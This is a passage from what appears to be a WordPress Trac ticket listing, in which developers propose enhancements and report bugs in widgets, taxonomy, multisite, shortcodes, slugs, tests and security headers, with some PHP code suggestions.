Screenshot http://cl.ly/image/3Y363s242a3y What is odd about this is that it only happens sometimes and it has randomly width that it spills over as well. See additional screenshot. http://cl.ly/image/3H3X371R0n3l If you expand the browser window the widget size actually expands as well. But seems to keep what ever margin it had on the left constant. Have another screenshot here from my trunk build. http://cl.ly/image/3E203q083Z3V I tried a search in Widgets for trac and couldn't find anything related. If this is proper UI for widgets it does seem a little random to me. " RDall Future Releases 38863 Text change when activating a theme Themes low minor Awaiting Review enhancement new dev-feedback 2016-11-19T02:43:03Z 2022-06-10T05:43:12Z "When switching themes, after activating we see: New theme activated. Visit site [/wp-admin/themes.php?marks=168#L168, /wp-admin/themes.php, L.168] Because it needs not to be a NEW theme, I suggest the following: ''Theme changed and activated succesfully.'' " Presskopp Future Releases 54420 Tests: Mock REST API remote requests hellofromTonya Build/Test Tools normal normal Future Release defect (bug) reopened dev-feedback 2021-11-11T15:43:01Z 2022-10-10T13:18:47Z "Recent timeout failures ([https://github.com/WordPress/wordpress-develop/runs/4174016878?check_suite_focus=true see GitHub failed job]) of specific REST API tests show some tests are not mocking the remote requests. These requests can be mocked with a callback hooked into `'pre_http_request'` filter. Each test should be reviewed to determine: * If a remote request to a live API endpoint is being made * If those specific requests should/can be mocked * and then mocks created for each in its context of the condition under test Ideally a mocking strategy could be created to abstract the heavy lifting and make it easier for these tests to mock the requests." hellofromTonya Future Releases 53010 Tests: introduce namespacing for the test classes hellofromTonya Build/Test Tools normal normal Future Release task (blessed) assigned dev-feedback 2021-04-09T15:51:13Z 2024-03-15T08:10:07Z "Introducing namespaces in the production code for WordPress Core is a hot topic, so I very purposely do NOT want to touch that in this ticket. However, for the test suite, which doesn't get shipped with the WordPress production code, it's a whole other matter. == Benefits Using namespaces in the test suite provides us with the following benefits: 1. If used consistently and providing they follow a set pattern (more about this below), they will make it very easy for contributors to find the test files/classes they are looking for. 2. It will allow for shorter file and test class names, while those will still be descriptive. 3. And... it will allow for mocking PHP native functions by declaring a namespaced version of that same function in the test class. 4. It will also allow more easily for multiple test classes to be created to test one particular feature/function, which the current naming scheme does not allow for. This will allow for tests for the same functionality, but which need different fixtures (setup/teardown) to be encapsulated in their own test classes. == Caveats: As the WordPress Core test suite is used not only by Core, but also by plugins and themes for integration tests, the test class namespacing should be reserved for actual test classes and - for now - not be applied to test utility classes / Abstract base test classes (i.e. the `tests/phpunit/includes` directory should NOT be touched for now). == Proposed pattern The current directory structure for tests is, to put it mildly, confusing and inconsistent. To solve that, I would like to propose the following pattern: * File paths: `tests/phpunit/tests/wp-[includes|admin]/[SubFolder/]*Class_Under_Test/FunctionUnderTest[OptionalSubsetIndicator]Test.php` * Namespace: `WordPress\Tests\WP_[Includes|Admin]\[SubFolder\]*Class_Under_Test` * Classname: `FunctionUnderTest[OptionalSubsetIndicator]Test` For WP Core files which only contain functions outside of a class structure, the following pattern is proposed: * File paths: `tests/phpunit/tests/wp-[includes|admin]/[SubFolder/]*Functions_FileName/FunctionUnderTest[OptionalSubsetIndicator]Test.php` * Namespace: `WordPress\Tests\WP_[Includes|Admin]\[SubFolder\]*Functions_FileName` * Classname: `FunctionUnderTest[OptionalSubsetIndicator]Test` The pattern I'm proposing does imply a re-organisation of the test suite directory and file structure, but that IMO is for the better. It also follows a PSR4-like pattern which will be more intuitive for new contributors to work with, as well as follow the PHPUnit recommended test class name pattern with having the `Test` as the end of the class name. This will also allow for using PSR-4 autoloading for the tests classes and adding the `autoload-dev` directive to the `composer.json` file. == Planning This should be regarded as a small project and not all renaming needs to be done at the same time. New tests should start following the above proposed pattern as soon as consensus has been reached about this proposal. Existing tests can be gradually switched over to the new pattern over time. == Additional tasks associated with this project - [ ] Updating the contributors handbook for Core. - [ ] Verify that the WordPressCS sniffs will validate this pattern correctly. - [ ] Write a Make post about the decision once consensus has been reached." jrf Future Releases 57586 term_exists() return type not consistent regarding wp_insert_term() Taxonomy 3.0 normal normal Future Release enhancement new dev-feedback 2023-01-30T10:14:03Z 2023-09-15T03:57:43Z "`term_exists()` returns an array of strings containing `term_id` and `term_taxonomy_id`. Although `wp_insert_term()` as well as `wp_update_term()` return an array of integers. For consistency, it'd be better to return alway the same type. Also, it'd be less error prone." hugod Future Releases 27425 Templates For Posts Formats Post Formats normal normal enhancement new dev-feedback 2014-03-15T18:16:18Z 2019-06-04T20:46:12Z "If I opt to use Custom Post Templates, then I can easily put a custom post template by putting a file named single-[name of the custom post], but that same feature is not available for the post formats. I love the post format feature in WordPress, and people just don't want to use that for some reasons, but this would really attract some of the audience to use the post formats. For example, a post with Audio format will first look for single-audio.php or single-audioformat.php or anything cuz it single-audio.php may effect the Audio Custom post type. What do you guys think of this idea?" hardeepasrani Future Releases 23049 Template hierarchy for 404 johnbillion* Themes normal normal Future Release enhancement accepted dev-feedback 2012-12-22T17:19:05Z 2017-09-27T16:09:23Z "load 404-{post-type}.php when url structure matches post permalink structure but there is no post at that address. load 404-{taxonomy}.php when url structure matches taxonomy permalink structure but doesn't match any specific taxonomy tag URL. And so on.... The idea is to have different 404 pages based on the context to which the URL refers. For example if a site has a blog and a shop it might be better to show a blog specific 404 page when the URL might be interpreted as a post and a shop specific 404 page when the URL might be interpreted as a product." mark-k Future Releases 37914 Taxonomy: Allow terms to be previewed before publishing Taxonomy 4.7 normal normal Future Release enhancement new dev-feedback 2016-09-01T20:40:31Z 2019-06-04T21:26:08Z "There is currently no mechanism to preview or draft taxonomy terms. As soon as a draft post with new terms is saved, for example, the new term is published, visible to other users in wp-admin, and could be visible on the front end of the site depending on the theme and plugins. The lack of a draft or preview mechanism also makes it impossible to manage terms in the customizer. Long term, the goal is to enable posts and terms to be able to be live-previewed with front end context, based on functionality being developed in the [https://github.com/xwp/wp-customize-posts Customize Posts] and, now, [https://github.com/xwp/wp-customize-terms Customize Terms] plugins. In 4.7, with the new ability to create posts wintih nav menus (#34923), we'd like users to also be able to create terms so that they an set up their site structure. Unfortunately this is not possible until we have a mechanism for previewing terms. I'm currently milestoning this for 4.7 so that we can try to add support for that feature (in a separate ticket), but this ticket is for API support only and still may be more than we can complete in time for 4.7. Based on comments from @boonebgorges on #34923, there are a couple of potential approaches for enabling term previewing: - Introduce a `term_status` field > Even if we don't have anything as robust as a ""term status API"", we still have to be sure that, at the very least, term_status != 'publish' terms are excluded from most queries - a change that has the potential for weird back compat issues. - An internal taxonomy for draft terms, which may be more conservative but also more complex, especially if we want to support things like hierarchy for draft terms. > It may be easier (maybe more code, but fewer hacks) to do on-the-fly registration of a separate internal taxonomy for each taxonomy that's getting a draft term added via the Customizer. We'll want a future-proof solution that can support term meta being previewable as well. `auto_draft` posts are the inspiration on the posts end for the customizer approach." celloexpressions Future Releases 54521 Taxonomy term quick edit does not save if taxonomy has non latin characters Taxonomy 5.8.2 normal normal Future Release defect (bug) new dev-feedback 2021-11-26T11:52:46Z 2022-10-07T21:33:25Z "This issue started from the following WooCommerce ticket https://github.com/woocommerce/woocommerce/issues/31037 After investigating, I could reproduce the issue by doing the following - Register a new taxonomy that contains Greek character `wp_ελληνικό_tax` - {{{ register_taxonomy( 'wp_ελληνικό_tax', array( 'post' ), $args ); }}} - Create a term - Edit the term through quick edit [[Image(https://user-images.githubusercontent.com/2484390/141967192-60de334d-e5ec-437e-9574-3cd9aa30110c.png)]] (for a strange reason, I cannot make the image appear inline) - You'll get a `0` error, with no indication - If you edit the term through the normal edit (not quick edit) it works fine. I already have a suggestion on how to fix this error https://developer.wordpress.org/reference/functions/wp_ajax_inline_save_tax/ This **wp_ajax_inline_save_tax** function, sanitizes the taxonomy, and `wp_ελληνικό_tax` becomes `wp__tax`, which doesn't exist. (hence the 0 error) Why is the taxonomy needed? Cause currently, it calls `get_term` , passing `term_id` and `taxonomy_slug`. Instead, what we could do is - avoid sanitizing the taxonomy slug, seems like there is no need - try and get the tag/term earlier, by calling `get_term` with just the `term_id` (as `term_id` is unique, regardless of the taxonomy it belongs to) I have attached a revised version of this function {{{#!php <?php function wp_ajax_inline_save_tax() { check_ajax_referer( 'taxinlineeditnonce', '_inline_edit' ); if ( ! isset( $_POST['tax_ID'] ) || ! (int) $_POST['tax_ID'] ) { wp_die( -1 ); } $id = (int) $_POST['tax_ID']; if ( ! current_user_can( 'edit_term', $id ) ) { wp_die( -1 ); } // Try and get the tag just by ID, without the taxonomy argument $tag = get_term( $id ); if ( null === $tag || is_wp_error( $tag ) ) { wp_die( 0 ); } $taxonomy = $tag->taxonomy; $wp_list_table = _get_list_table( 'WP_Terms_List_Table', array( 'screen' => 'edit-' . $taxonomy ) ); // $tag = get_term( $id, $taxonomy ); $_POST['description'] = $tag->description; ........ ....... } }}} If agreed, I'd like to work on this issue and do my first contribution on WordPress. Panos Synetos Code Wrangler @ Automattic " panagiotis.synetos Future Releases 50047 Taxonomy parent select field not cleared after creating category Taxonomy 5.4 normal minor Awaiting Review defect (bug) new dev-feedback 2020-05-01T15:25:33Z 2020-05-01T16:53:13Z "When creating a new category in the create category view and a parent is selected, the parent selector field is not reset to ""None"" after successful submission. The same is true for custom select fields added to this view. Don't know if this behavior is on purpose but IMO doesn't make sense?" wordnixe Future Releases 29418 Taxonomy archive query not including all of its post types. SergeyBiryukov Taxonomy 3.9.2 normal normal Awaiting Review defect (bug) reviewing dev-feedback 2014-08-28T15:37:46Z 2020-05-06T21:00:39Z "I've noticed this in a project i'm working on. I did some digging in '''wp-includes/query.php''' file, and found that this is the issue. In '''3.9.2 files''', in line '''2501''' there's this {{{ foreach ( get_post_types( array( 'exclude_from_search' => false ) ) as $pt ) { }}} Not sure if this is intended or not, maybe yes, but the query var name is missleading in this case, which is also excluding the post type from its taxonomies archives too. In any case, if this is to be fixed, and in fact is not supposed to be here, just changing the line for this should work, as we should expect. {{{ foreach ( get_post_types( array() ) as $pt ) { }}} Hope this helps, thanks." msaggiorato Future Releases 9547 Taxonomy - interesting 'unused' term_order column in table term_relationships. Taxonomy 2.8 high normal Future Release enhancement assigned dev-feedback 2009-04-16T15:19:42Z 2023-11-28T19:15:17Z "During development of plugin [http://wordpress.org/extend/plugins/xili-language/ xili-language], and to sort term by term list of languages in a taxonomy, I discover unused column '''term_order''' in ''term_relationships'' table and lack of functions in core about this column. Like medias in post, here the user can define languages list with first, second, third,... languages for his website (and xml header). Taxonomy tools are here very powerful without adding tables or annoying coding. ([http://plugins.trac.wordpress.org/browser/xili-language/tags/0.9.8.2/xili-language.php see code here line 1309-1370]). Before to complete these very basic functions,… Is it forecast to have more basic / generic functions using '''term_order''' in taxonomy.php ? [http://core.trac.wordpress.org/ticket/9546 Related ticket]" michelwppi Future Releases 45107 Taxonomies should only be allowed to support one object type Taxonomy normal normal Awaiting Review enhancement new needs-unit-tests 2018-10-17T16:48:28Z 2019-02-12T21:00:32Z "Currently, taxonomies can be registered to any object type (posts, comments, users, etc.). But core does not enforce a one to one limit for object types to taxonomies, which can be problematic. For example, if a taxonomy is registered to both users and posts, there can be unintended consequences. Adding a term to a post with an ID of 3 would also cause a user with an ID of 3 to have that term. Removing that term from the user would also affect the post. Unique IDs are only enforced on a per object type basis, not accross all types. The approach here would be to introduce a `_doing_it_wrong()` notice (and possibly even return a `WP_Error`) when a taxonomy is registered to multiple object types. **Good:** `register_taxonomy( 'custom_tax_name', array( 'post', 'page', 'cpt' ) );` **Bad:** `register_taxonomy( 'custom_tax_name', array( 'post', 'user' ) );` == Why == Adding this to Core would open the door for the following potential features: - `WP_Tax_Query` support could be added to users (see #31383), comments, etc. - Built-in fields for taxonomy could be added to the REST API for users, comments, etc. - UIs could be added for users (also see #31383), comments, etc. == Backward Compatibility == To continue supporting backward compatibility for sites that are registering a taxonomy for multiple object types, `register_taxonomy()` could continue working as is. The only change would be to return a `WP_Error` and a `_doing_it_wrong()` notice. In the future, `register_taxonomy()` could be changed to only register objects with the same type as the first specified object type. Example: `register_taxonomy( 'custom_tax_name', array( 'post', 'user', 'page' ) );` would only register the taxonomy for posts and pages (same object type)." desrosj Future Releases 12056 "target=""_blank"" being stripped from Profile Bio and Category Description" Formatting 2.9.2 normal normal Future Release enhancement new dev-feedback 2010-01-27T16:50:00Z 2019-10-29T11:02:01Z "Many apologies if this is a duplicate. I have searched but did not find it yet posted. I noticed that target=""_blank"" is being stripped from my ""a href"" tags my profile ""Biographical Info"" field even though the ""a href"" with the URL and closing tag still remain. It happens every time I save my profile. This was independently verified. It is a regular wordpress install running 2.9.1 (not wordpressmu, etc.). My original thread can be found here: http://wordpress.org/support/topic/355388?replies=1" lovewpmu Future Releases 47352 Take into account the current admin email address when rate limiting the recovery mode email Site Health 5.2 normal normal Future Release defect (bug) new dev-feedback 2019-05-22T20:28:27Z 2022-09-19T17:02:17Z "Here's a process which I've seen occur twice in the last few days: * A change to a site was deployed and a fatal error gets triggered somewhere. * The recovery mode email was sent out. * The developer checks the current value of the admin email address and discovers it belongs to someone who left the company years ago. * They change the admin email address to their own email address and re-trigger the fatal error, but the recovery mode email doesn't get re-sent to the new address because there's a one day rate limit in place. This prevents the user from enabling recovery mode for at least a day. The option that acts as the ""last sent"" record for the recovery mode email (`recovery_mode_email_last_sent`) should take into account the admin email address, for example by hashing it and including it in the option key. Aside: Is there a reason an option is used instead of a transient?" johnbillion Future Releases 33234 Tags/Categories Count Incorrect Taxonomy normal normal defect (bug) new dev-feedback 2015-08-02T22:31:34Z 2023-05-03T20:24:41Z The tags and categories management pages show inaccurate count when posts are marked private. mikedunn Future Releases 49263 Switching blog doesn't switch locale I18N normal normal Awaiting Review enhancement new dev-feedback 2020-01-21T19:34:15Z 2020-05-22T21:02:25Z "#26511 introduced `switch_to_locale()`, but didn't take into account the Multisite use case that @rmccue mentioned in ticket:26511#comment:8. It seems reasonable to expect that switching to a site with a different locale would switch the locale. You can see that it currently doesn't by setting up a network with the following conditions and code, and then loading each site. * The locale of site `1` is `en_US` * The locale of site `2` is `es_MX` * The locale of site `3` is `fr_FR` {{{#!php add_action( 'admin_init', function() { echo get_locale() . '<br>'; // loaded site _e( 'Howdy, %s' ); echo '<hr>'; switch_to_blog( 2 ); // spanish echo get_locale() . '<br>'; _e( 'Howdy, %s' ); restore_current_blog(); echo '<hr>'; switch_to_blog( 3 ); // french echo get_locale() . '<br>'; _e( 'Howdy, %s' ); restore_current_blog(); echo '<hr>'; switch_to_blog( 1 ); // english echo get_locale() . '<br>'; _e( 'Howdy, %s' ); restore_current_blog(); echo '<hr>'; echo get_locale() . '<br>'; // back to loaded site _e( 'Howdy, %s' ); wp_die(); } ); }}} The strings are always translated using the loaded site's locale, rather than the switched site. A rudimentary way to see the desired effect would be something like this: {{{#!php function switch_to_blog_locale() { $locale = get_option( 'WPLANG', 'en_US' ); // bypass get_locale() b/c early return is stuck on the starting site. switch_to_locale( $locale ); } add_action( 'switch_blog', 'switch_to_blog_locale' ); }}} ...although that doesn't take user locales into account, doesn't restore previous locales, etc. Related: #44844" iandunn Future Releases 25293 Switch_to_blog not switching the siteid Networks and Sites 3.0 normal minor Future Release defect (bug) new dev-feedback 2013-09-12T09:11:20Z 2017-06-08T20:17:36Z "When having multiple network on multisite making the following: {{{ switch_to_blog(1); $options = get_site_option( 'my_option' ); restore_current_blog(); }}} The options retrieved are the options of the current siteid and not the siteid of the switched blog. One of the options is to make something like this : {{{ global $wpdb; // Get the previous siteid $previous_site_id = $wpdb->siteid; $previous_blog_id = $wpdb->blogid; // Go to site 1 switch_to_blog(1); // Set the blog siteid to 1 $wpdb->set_blog_id( 1, 1 ); // Get the options $options = get_site_option( 'my_option' ); restore_current_blog(); $wpdb->set_blog_id( $previous_blog_id , $previous_site_id ); }}} Or {{{ // Get the previous siteid $site_id = $wpdb->siteid; // Set the blog siteid to 1 $wpdb->set_blog_id( $wpdb->blogid, 1 ); // Get the options $options = get_site_option( 'my_options' ); $wpdb->set_blog_id( $wpdb->blogid , $site_id ); }}} The thing is that the switch_to_blog function does not specify the switched siteid on the method $wpdb->set_blog_id if the network is not the same as the current blog." Rahe Future Releases 41819 Support the paged argument in WP_Site_Query and WP_Network_Query spacedmonkey Query 4.6 normal normal Future Release enhancement assigned dev-feedback 2017-09-06T18:21:04Z 2017-11-01T17:47:07Z "The {{{WP_Site_Query}}} and {{{WP_Network_Query}}} both support the {{{offset}}} and {{{number}}} arguments. It would be handy to be able to use the {{{paged}}} argument, to make the pagination easier. " birgire Future Releases 29429 Support frame-ancestors directive over X-Frame-Options Security normal normal Future Release enhancement reopened dev-feedback 2014-08-29T14:25:35Z 2019-07-29T00:18:23Z "According to MDN, `X-Frame-Options` is deprecated: https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options `frame-ancestors` should be used instead. Previously #12293" danielbachhuber Future Releases 37000 Support for the SameSite cookie attribute Security normal normal Future Release enhancement new dev-feedback 2016-06-02T13:31:13Z 2022-11-11T10:45:05Z "IETF's [https://tools.ietf.org/html/draft-west-first-party-cookies Same-site Cookies draft] was [https://www.chromestatus.com/feature/4672634709082112 shipped in Chrome 51 and Opera 39]. The SameSite cookie attribute instructs a browser not to send that cookie with cross-origin third-party requests (such as iframes, embedded images, and Ajax requests). This effectively mitigates CSRF attacks as, for example, the user will not be authenticated for a given third party URL that's being used in a CSRF attack. More information on the SameSite attribute can be found here: http://www.sjoerdlangkemper.nl/2016/04/14/preventing-csrf-with-samesite-cookie-attribute/ We should investigate whether setting the `SameSite=lax` attribute is of benefit to the `auth` and/or `logged_in` cookies in WordPress, and if so consider implementing it once the draft becomes an RFC. PHP uses the `setcookie()` wrapper for setting cookies, which means that setting the SameSite attribute is not possible using that function, until such point that support for the attribute gets added. If WordPress were to implement the SameSite attribute, we'd need our own cookie handling function which constructs and sets the `Set-Cookie` header itself, and use it in place of `setcookie()` (side note: this may also be beneficial to unit testing)." johnbillion Future Releases 44658 Support BETWEEN for term names in WP_Tax_Query/WP_Term_Query Query normal normal Future Release feature request new dev-feedback 2018-07-27T20:23:30Z 2019-09-11T15:56:51Z This patch adds `name__between` parameter in `WP_Term_Query` and `between` operator in `WP_Tax_Query`. soulseekah Future Releases 49964 Support asynchronously loading TinyMCE TinyMCE 5.0 normal normal Future Release enhancement new dev-feedback 2020-04-20T22:05:18Z 2020-08-13T14:19:40Z "In order to facilitate [https://github.com/WordPress/gutenberg/issues/21738 asynchronously loading TinyMCE in Gutenberg] we need to be able to prevent WordPress from automatically enqueueing `wp-tinymce` and injecting inline i18n initialization scripts. (There's plenty of context in the Gutenberg issue including related tickets, so I'll try not to repeat any of that here.) I'd like to propose wrapping [https://developer.wordpress.org/reference/classes/_wp_editors/print_tinymce_scripts/ _WP_Editors#print_tinymce_scripts] in an action that Gutenberg could use for when the editor is loading." sarayourfriend Future Releases 41403 "Support ""class"" and ""id"" attributes on wp_oembed_get()" Embeds normal normal Future Release defect (bug) new close 2017-07-21T19:58:48Z 2020-09-22T13:52:43Z "The oembed function `wp_oembed_get( $url, $args )` allows us to set additional arguments for retrieving embed HTML. The problem is that currently the function supports two arguments, only `width` and `height`. In some cases developers need more flexibility, to set other HTML attributes like `id`, `class` and maybe even `title` (for better accessibility). ---- I was trying to thinking of an example and I think that the simplest example would be [https://v4-alpha.getbootstrap.com/utilities/responsive-helpers/ bootstrap responsive embeds]. {{{ <div class=""embed-responsive embed-responsive-21by9""> <iframe class=""embed-responsive-item"" src=""https://...""></iframe> </div> }}} Currently you can't set custom classes in iframe with the attributes: {{{ wp_oembed_get( 'https://...', array( 'class' => 'embed-responsive-item' ) ); }}} " ramiy Future Releases 34555 superscript in url Permalinks normal normal defect (bug) new dev-feedback 2015-11-02T10:39:17Z 2019-06-04T20:53:06Z "If you have a superscript in the post title and selected post-name structure for permalink, it creates a slug as in the image: http://prntscr.com/8y3wsc " sabrisahincan Future Releases 20459 Super admin should be able to bypass banned/limited domains when creating users Users normal minor enhancement new dev-feedback 2012-04-16T16:12:25Z 2019-06-05T06:38:31Z "The function `wpmu_validate_user_signup()` is run whenever a new user is created, either through self-registration (wp-signup.php) or through manual user creation by an admin. `wpmu_validate_user_signup()` does two different kinds of validation: (1) validation that is more or less technically required by WP, like spaces in usernames, email/login uniqueness, etc. (2) checks against some admin-set membership restrictions, namely, email domain whitelist (limited_email_domains) and blacklist (`is_email_address_unsafe()` and banned_email_domains). The second kind of validation is problematic in the following use case: An MS install might restrict open membership based on email domains, but the admin might occasionally want to make exceptions to the rule and manually create an account. Currently, there are two ways to bypass the built-in checks: to temporarily remove the domain restrictions at Network Admin > Settings, or to filter `'wpmu_validate_user_signup'` and remove the error messages. Having to manually change settings for this purpose is pretty hackish. The filter method works, but my experience (from consulting with a fairly large number of MS network admins) is that this is a pretty common use case, so it seems like it should be supported by default. So I'm proposing that the domain checks be skipped when `is_super_admin()`. Patch attached." boonebgorges Future Releases 46973 Suggestion for selection boxes in Reading setting > settings > Dashboard Administration 5.2 normal normal Awaiting Review enhancement new dev-feedback 2019-04-18T09:46:30Z 2019-04-19T13:17:28Z "Hello, I got across with a suggestion while going through Reading setting > Setting > Dashboard. It would be more convenient if the two selection box(under Reading setting header) will be placed side by side using the white space right side. It will enhance the user experience and will result in clean design." monarkpatel Future Releases 18400 "Suggested label change for ""Stick this post to the front page""" Posts, Post Types normal normal Future Release enhancement new dev-feedback 2011-08-14T01:19:53Z 2020-02-06T19:45:40Z "In the Publish meta box, it would be more clear to say ""Stick this post to the top of the front page"" compared to saying ""Stick this post to the front page""." designsimply Future Releases 41792 Suggested Enhancement to WordPress' Handling of Authors and Author URL's Themes normal normal Awaiting Review enhancement new dev-feedback 2017-09-04T11:36:02Z 2017-09-06T07:59:42Z "Hi, everyone, my first post here, but I have some concerns. *WordPress' Handling of Authors* I feel it's not the right UX when, say on a single author blog, the url ""blog.com/author"" goes to 404. I'd like for WordPress to programmatically direct/redirect a blog.com/author to the archive of this single author if single author. I mean, say I, Kabolobari, am an author on a single author blog and the url to my posts is blog.com/author/kabolobari. So, WordPress automatically creates that based on my name choice. Now, since WordPress can also tell a multi-author blog once there's more than one author, I'd like if WordPress then automatically builds the url for such as blog.com/authors/kabolobar, Kabolobari being one author on this blog. Then if a user/browser were to backspace the url, of course, their intention would be to see all authors at blog.com/authors, right? Thus, WordPress shouldn't send them to a 404. WordPress should intelligently default that to a list of all the authors on the multi-author blog. Is my explanation clear? Then, WordPress can, as with other archives, leave a way for admins or theme developers to customize how they'd like this `authors.php`, as an example, template to be. To summarize, Single Author Blogs = blog.com/author/single-author Then, blog.com/author = This Single Author and a list of their posts Multi Author Blogs = blog.com/authors/multi-author Then, blog.com/authors = These authors list and a list of their posts Then leave all of these to be customizable by theme devs. I'm having a hard time hacking my way around this because of this feature which I see is unavailable. If I'm wrong and there's actually a straightforward way about this, kindly direct me. *As an Example* Kindly, study the website kincommunity.com. Because what I’m building is very similar to that. Now, you should notice that when you hit Creators on the navigation at this site, Kin Community’s developers chose a custom post type route to display their Creators. Thus, Creators takes you to kincommunity.com/our-community/. Then a single creator is at kincommunity.com/creators/rosanna-pansino/, for example. But when you try kincommunity.com/creators/, as a user you expect to see a list of all creators, right? But you get a 404. I figure if WordPress allowed for a native way to flex around this, so that say you added a role of Creator (coding it yourself or with a plugin such as Members by Justin Tadblock) and you give this new role about same level of cap as Author. Then one wouldn’t need to use CPT for this purpose and then the logic as I’ve explained above would take hold automatically with allowance for customization to look like the theme’s overall feel. Could we examine these concerns? Thanks." kbooshco Future Releases 55401 Subpages of a web page can be called twice Permalinks 5.9.3 normal major Awaiting Review defect (bug) new dev-feedback 2022-03-16T15:48:12Z 2023-07-20T18:41:13Z "Subpages of any website created with WordPress can be accessed twice. If you add a /0/ to the end of the regular URL, the same page can be called again. This page with /0/ at the end of the URL will also be indexed in Google. Example: https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/ https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/0/" manuel10503 Future Releases 18734 Subcategory archive does work with any name as parent category in URL Canonical 3.0.1 normal normal Future Release defect (bug) new dev-feedback 2011-09-21T15:10:46Z 2022-05-16T02:25:51Z "Parent category is ''parentcategory'' and his sub category is ''subcategory''. The URL will be ''domain.com/category/parentcategory/subcategory''. The problem is, that you will get the same page if you use any words as ''parentcategory''. Examples: - ''domain.com/category/xxx/subcategory'' - ''domain.com/category/subcategory'' - ''domain.com/category/foo/bar/subcategory'' IMO {{{redirect_canonical}}} should do his work here (and sometimes it does). In 3.1 it does redirect. In 3.1.4 it doesn't redirect; after r17549. In 3.2.1 it doesn't redirect. Duck_ found that it does redirect before r18079. In current trunk it doesn't redirect. " ocean90 Future Releases 22402 Stripping non-alphanumeric multi-byte characters from slugs Formatting normal normal enhancement new dev-feedback 2012-11-10T05:07:10Z 2019-06-04T19:44:12Z "`sanitize_title_with_dashes()` strips non-alphanumeric characters from a title to create a slug. Unfortunately it only strips ASCII non-alphanumeric characters. Apart from a few exceptions, all multi-byte characters are preserved. This means all non-Western (and plenty of Western) non-alphanumeric characters end up in the slug as they're treated just like any other multi-byte character. As an example, here are some common non-alphanumeric Chinese characters which would ideally be stripped from slugs, but are not: * 。 (U+3002, Ideographic Full Stop, %E3%80%82) * , (U+FF0C, Fullwidth Comma, %EF%BC%8C) * ! (U+FF01, Fullwidth Exclamation Mark, %EF%BC%81) * : (U+FF1A, Fullwidth Colon, %EF%BC%9A) * 《 (U+300A, Left Double Angle Bracket, %E3%80%8A) * 》 (U+300B, Right Double Angle Bracket, %E3%80%8B) Obviously it would be impractical to make a list of ''all'' the non-ASCII characters we want to strip from slugs. The list would be gigantic. So the question is, would it be possible to use Unicode ranges to blacklist (or whitelist) whole ranges of characters to be stripped from (or preserved in) slugs? Is this practical or even desirable? Or would it make more sense to continue using a list of just the most common multi-byte characters to be stripped? The latter makes a whole lot more sense, but the former is a more complete solution. Thoughts?" johnbillion Future Releases 25644 strip_shortcodes always removes text between shortcode tags, should be optional Shortcodes 3.6.1 normal normal enhancement new dev-feedback 2013-10-20T19:24:40Z 2019-06-04T21:09:05Z "strip_shortcodes will always remove all of the content between shortcode tags. So, for example, if I have a shortcode tag which wraps a link or a style around some text the text is lost when the shortcode is removed. Example: ''Lorem ipsum [highlight]dolor[ /highlight] sit amet, consectetur adipisicing elit'' becomes ''Lorem ipsum sit amet, consectetur adipisicing elit'' It should become ''Lorem ipsum '''dolor''' sit amet, consectetur adipisicing elit'' Removing the content between shortcodes may often be desirable behaviour, but there should be some way to retain the content. The easiest way would be for strip_shortcodes() to take a second parameter which defaults to true to remove the content, but if it is false then it leaves the content between the tags Example change to wp-includes/shortcodes.php Before {{{ function strip_shortcodes( $content ) { global $shortcode_tags; if (empty($shortcode_tags) || !is_array($shortcode_tags)) return $content; $pattern = get_shortcode_regex(); return preg_replace_callback( ""/$pattern/s"", 'strip_shortcode_tag', $content ); } function strip_shortcode_tag( $m ) { // allow [[foo]] syntax for escaping a tag if ( $m[1] == '[' && $m[6] == ']' ) { return substr($m[0], 1, -1); } return $m[1] . $m[6]; } }}} After {{{ function strip_shortcodes( $content, $strip_between = true ) { global $shortcode_tags; if (empty($shortcode_tags) || !is_array($shortcode_tags)) return $content; $pattern = get_shortcode_regex(); if($strip_between==true) return preg_replace_callback( ""/$pattern/s"", 'strip_shortcode_tag', $content ); else return preg_replace_callback( ""/$pattern/s"", 'strip_shortcode_tag_notbetween', $content ); } function strip_shortcode_tag( $m ) { // allow [[foo]] syntax for escaping a tag if ( $m[1] == '[' && $m[6] == ']' ) { return substr($m[0], 1, -1); } return $m[1] . $m[6]; } function strip_shortcode_tag_notbetween( $m ) { // allow [[foo]] syntax for escaping a tag if ( $m[1] == '[' && $m[6] == ']' ) { return substr($m[0], 1, -1); } return $m[1] . $m[5] . $m[6]; } }}} It's probably possible to do this with slicker code, but this is fairly simple and works. An example of when this problem is encountered in the real world is with the [http://wordpress.org/plugins/rb-internal-links/ RB internal links plugin] being used in post content. When the post is displayed by the [http://wordpress.org/plugins/popular-widget/ popular widget plugin] any text which was internally linked is lost, leaving a snippet of the post which makes no sense to a human reader. For an example on a live site see the first entry under the '''Most popular (all time)''' section on the right hand side of [http://diymediahome.org DIY Media Home]" jonscaife Future Releases 56172 Strict comparisons not used. General normal normal Awaiting Review defect (bug) new dev-feedback 2022-07-08T05:04:18Z 2023-10-26T00:02:19Z "On going through the core files, I observed that in many places strict comparison is not used. After that, I ran the code through the WPCS and also got the warnings for the same. Though it does not affect the flow of the site, it should be used. Few exampals are: 1 options-general.php {{{ 215 | WARNING | Found: ==. Use strict comparisons (=== or !==). 393 | WARNING | Found: ==. Use strict comparisons (=== or !==). }}} 2 sites.php {{{ 105 | WARNING | Found: ==. Use strict comparisons (=== or !==). 145 | WARNING | Found: !=. Use strict comparisons (=== or !==). 145 | WARNING | Found: !=. Use strict comparisons (=== or !==). 157 | WARNING | Found: ==. Use strict comparisons (=== or !==). 185 | WARNING | Found: !=. Use strict comparisons (=== or !==). 185 | WARNING | Found: !=. Use strict comparisons (=== or !==). }}} " hilayt24 Future Releases 35669 Store widgets in a custom post type instead of options Widgets 2.8 normal normal Awaiting Review enhancement new dev-feedback 2016-01-30T20:00:34Z 2019-01-10T05:18:15Z "Widget instances are stored in options. For a multi-widget (`WP_Widget`) the widget instances of a given type (`id_base`) are stored in a serialized array of instance arrays. A widget ID is comprised of a widget's `id_base` followed by a number which is the array index for that widget instance. For example, the third-created Text widget would have the ID `text-4` (note that multi-widget numbering starts at 2). Old single widgets do not include the numeric index after the `id_base`, and technically they could be stored anywhere (see #35656 for suggestion to deprecate old single widgets). == Issues There are several problems with how widgets are currently stored as options. '''Scalability:''' For sites with a large number of widget instances, the entire collection of widgets must be unserialized with each request to access only one widget of a given type. (Note #23909 for how all widget instances get registered with every request.) For sites that use Memcached as an external object cache where cache buckets have a 1MB limit, since all widget instances of a given type are stored in a single option, sites with a huge number of widgets will overrun this 